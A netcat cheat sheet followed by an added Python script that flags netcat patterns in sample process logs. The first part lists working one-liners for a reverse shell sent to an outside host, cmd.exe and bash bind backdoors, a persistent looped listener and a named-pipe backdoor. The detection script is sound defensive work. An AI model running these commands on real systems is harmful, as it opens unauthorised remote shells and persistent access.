Connect to a socket on host 192.168.1.1 on TCP port 81
nc 192.168.1.1 81
Listen on the local machine for inbound TCP connections on port 81
nc -nvlp 81
Reverse shell sent to host 10.0.0.2
over TCP port 53
nc 10.0.0.2 53 -e /bin/bash
Backdoor listening on TCP 80 set to execute cmd.exe when connected
nc -nvlp 80 -e cmd.exe
Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names (-n), don't send any data (-z), and only wait 1 second for a connection (-w1)
nc -nvzw1 10.0.0.1 10-90
Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this; use nohup as well so the loop is not tied to the session that started it.
while [ 1 ]; do echo "started"; nc -l -p 1234 -e /bin/sh; done
Netcat relay used to forward everything received by the host on TCP 4321 to 10.0.0.1 on TCP 8123
nc -l -p 4321 | nc 10.0.0.1 8123
Create a netcat backdoor without -e support. This creates a named pipe which is used to funnel data between bash and nc.
mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
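Every invocation on this sheet leaves a recognisable process command line behind (a clustered -l flag, -e pointing at a shell, two nc stages in one pipeline, a mknod ... p beside a redirected nc, a -z sweep over a port range), which is what an endpoint detection rule keys on. The script below is an added example, not part of the original cheat sheet: it parses constructed process-creation records in a hypothetical "pid|user|cmdline" format (real auditd or EDR events would need their own field extraction) and tags each record with the netcat pattern it matches. The tag names and the record format are assumptions; the flag letters and the ncat long-option spellings are the real ones.

```python
"""Tag netcat usage patterns (listener, -e shell, relay, named-pipe backdoor,
port sweep) in process-creation logs. Added example; hypothetical log format."""
import re
import shlex

# Constructed sample records (assumption: "pid|user|cmdline", one per line,
# standing in for auditd/EDR process-creation events).
SAMPLE_LOG = """\
1001|alice|nc 192.168.1.1 81
1002|alice|nc -nvlp 81
1003|www-data|nc 10.0.0.2 53 -e /bin/bash
1004|svc|nc -nvzw1 10.0.0.1 10-90
1005|svc|while [ 1 ]; do echo "started"; nc -l -p 1234 -e /bin/sh; done
1006|svc|nc -l -p 4321 | nc 10.0.0.1 8123
1007|svc|mknod backpipe p
1008|svc|/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
1009|bob|grep -l pattern file.txt
"""

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
LONG_FLAGS = {"--exec": "e", "--sh-exec": "c", "--listen": "l"}  # ncat spellings
SHELL_RE = re.compile(r"(^|/)(sh|bash|dash|zsh|ksh|cmd(\.exe)?|powershell(\.exe)?)$", re.I)
FIFO_RE = re.compile(r"\bmkfifo\s+\S+|\bmknod\s+\S+\s+p\b")
REDIR_TOKEN = re.compile(r"^\d*[<>]{1,2}\S*$")   # 0<backpipe, 1>backpipe, >&
PORT_RANGE = re.compile(r"^\d+-\d+$")


def split_stages(cmdline):
    """Break a one-liner into simple commands: first on ';' '&&' '||', then on '|'.
    Quoted separators are not handled; good enough for one-liners like these."""
    stages = []
    for chunk in re.split(r";|&&|\|\|", cmdline):
        stages.extend(s.strip() for s in chunk.split("|") if s.strip())
    return stages


def parse_stage(stage):
    """Return (argv without redirections, set of short-flag letters, exec target or None).
    Letters come from clustered options such as -nvlp or -w1 (digits dropped)."""
    try:
        argv = shlex.split(stage)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        argv = stage.split()
    argv = [a for a in argv if not REDIR_TOKEN.match(a)]
    letters, target = set(), None
    for i, tok in enumerate(argv[1:], start=1):
        if tok in LONG_FLAGS:
            letters.add(LONG_FLAGS[tok])
        elif tok.startswith("-") and len(tok) > 1 and not tok.startswith("--"):
            letters.update(c for c in tok[1:] if c.isalpha())
        else:
            continue
        # -e / -c (or --exec / --sh-exec) bind the following argument to the socket
        if tok[-1] in "ec" and i + 1 < len(argv):
            target = argv[i + 1]
    return argv, letters, target


def classify(cmdline):
    """Map one command line to the set of detection tags it triggers."""
    tags = set()
    if FIFO_RE.search(cmdline):
        tags.add("named-pipe-created")
    nc_count, shell_piped = 0, False
    stages = split_stages(cmdline)
    for stage in stages:
        argv, letters, target = parse_stage(stage)
        if not argv:
            continue
        if argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
            if SHELL_RE.search(argv[0]) and len(stages) > 1:
                shell_piped = True    # a shell is one stage of a pipeline
            continue
        nc_count += 1
        listening = "l" in letters
        tags.add("listener" if listening else "nc-outbound")
        if target is not None:
            tags.add("exec-attached")
            if SHELL_RE.search(target):
                tags.add("listener-shell" if listening else "reverse-shell")
        if "z" in letters and any(PORT_RANGE.match(a) for a in argv):
            tags.add("port-scan")
    if nc_count >= 2:
        tags.add("relay")
    if nc_count and shell_piped:
        tags.add("shell-piped-to-nc")
    if nc_count and re.search(r"\b(while|until)\b", cmdline):
        tags.add("persistent")
    return tags


def scan_log(text):
    """Return {pid: sorted tags} for every record that matched at least one rule."""
    findings = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, _user, cmdline = line.split("|", 2)
        tags = classify(cmdline)
        if tags:
            findings[int(pid)] = sorted(tags)
    return findings


if __name__ == "__main__":
    for pid, tags in scan_log(SAMPLE_LOG).items():
        print(pid, ", ".join(tags))
```

The benign record (pid 1009, grep -l) produces no tags because the rule checks the program name before it looks at flag letters; "nc-outbound" on its own is low severity and only worth alerting on in combination with the other tags or with an unexpected user.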